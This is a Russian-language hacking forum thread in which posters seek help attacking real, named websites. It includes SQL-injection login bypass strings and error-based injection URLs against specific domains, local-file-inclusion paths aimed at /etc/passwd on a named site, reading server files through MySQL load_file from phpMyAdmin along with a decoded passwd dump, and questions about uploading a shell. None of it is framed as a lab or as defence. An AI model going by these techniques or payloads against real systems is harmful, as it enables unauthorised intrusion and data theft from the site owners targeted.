Читал статьи, но не могу понять как обходить фильтра XSS. Допустим в SQL-Инъекциях всё ясно, как обходить. Кто может мне объяснить нормально. Строка 360 исходного кода. <input type="text" name="search_text" id="search_text" value="">alert('XSS')" maxlength=""> Выделенный текст это я так понимаю фильтрующие элементы.. Если бы XSS запрос так и отображался, то значит XSS-Инъекции нет?
Есть доступ phpmyadmin with good video)) Как узнать директорию, в которой сайт лежит из pma? Есть готовые скрипты для этого? Енжой, over 6500 video)
ему document_root нужен, похоже из пма попробуйте почитать файлы через local data infile. либо как обычно через ошибки на сайте
А нету готового скрипта, который читает файлы и в случае не пустого множества возвращает путь. В общем у меня 3 сайта pma с пороно)) Один на load_file passwd возвращает 726f6f743a783a303a303a726f6f743a2f726f6f743a2f62696e2f626173680a62696e3a783a313a313a62696e3a2f62696e2e2e2e Второй Blob ------------------------- По идее есть же скрипт, который через множество селектов получает site_directory. Смысл самому эти селекты делать)?
726f6f743a783a303a303a726f6f743a2f726f6f743a2f62696e2f626173680a62696e3a783a313a313a62696e3a2f62696e2e2e2e Это root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin... Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/include/common.php on line 462 Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /var/www/include/common.php on line 466 Вот и путь Notice: Undefined index: host in /var/www/smf/Sources/Load.php on line 1913 Notice: Undefined index: host in /var/www/smf/Sources/Load.php on line 1913 Notice: Undefined index: welcome_guest_activate in /var/www/smf/Sources/Subs.php on line 3165 Notice: Undefined index: welcome_guest in /var/www/smf/Sources/Subs.php on line 3165 Notice: Undefined index: lang_locale in /var/www/smf/Sources/Subs.php on line 868
Все нормально тебе возвращается. И через файлы можно получить путь до сайта. В каких файлах надо искать зависит от ОС и веб сервера.
Хочу посмотреть логи сервера, и как я понял к каждому сайту есть свой конфиг. В основном конфиге есть такая строчка include vhost/*.conf .. Т.е все файлы с расширением conf, могу ли я подобрать имена файлов через читалку load_file (mysql)?
Возможно, но наверно только путем перебора. Если имена сайтов на этом сервере известны, то пробуй вначале варианты этих имен. К примеру есть сайт site.com, то пробуй открыть site_com.conf, site.conf, site.com.conf и т.п.
Как залиться ? Погуглил про lfi+phpinfo lekkeradverteren.nl/ioncube/loader-wizard.php?page=phpinfo Это как я понимаю lfi http://lekkeradverteren.nl/ioncube/...me=../../../../../../../etc/passwd&download=1 Вообщем вопрос к знатокам ,как залиться ? Пробовал скриптом от Pashkela ,не получилось.
сайт http://www.bogema-hotel.ru/access_admin.php - с уязвимой админкой. Вставляю в login "admin ' or '1' =1/*" Перебираю варианты - ' or '1' =1-- но результата не достигаю. Спустя час решил написать сюда. Почему так? Фильтрация или неверно заданный запрос? Хотя делал все по авторской статье.
Что-то мне подсказывает что вот эту Code: https://rdot.org/forum/showthread.php?t=124 ну или она же тут, на ачате Code: http://forum.antichat.ru/threads/43966/ и скорее всего пробует пункт 1.3 Уязвимы поле логин и пароль, обход авторазации
Именно по ней. Именно по пункту 1.3 подставляя в поле логин и пароль соотвественно. Но даже если просто в пароль не давало результата и сообщения об ошибке ,если писал в логин Code: Admin' -- и Code: Admin' --
Инъекция присутствует. Пробуйте далее. Если нагрузка с обходом авторизации не проходит, попробуйте другие вектора.
Другой вектор: Такой же сдвиг cms Code: http://www.kazanboats.ru/index.php?id=59"+(1)and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)-- - пишет hek Code: http://www.kazanboats.ru/index.php?id=59%20+%281%29and%28+1+from%28+count%28*%29,concat%28%28+table_name+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29-- Выбрасывает на страницу Пробую замаркировать select при помощи concat - но не получается. Возможно, неправильно формирую запрос. Сейчас пытаюсь просто найти кол-во таблиц - http://www.kazanboats.ru/index.php?id=59'+order+by+1000/* и http://www.kazanboats.ru/index.php?id=59'+order+by+1/* Выдает одинаковый результат. Явно слепая иньекция. Но если убрать кавычки или минус перед 59 - страница появляется. Подскажи с самого простого, с поиска кол-ва таблиц. Нужно шифровать запрос? order+by?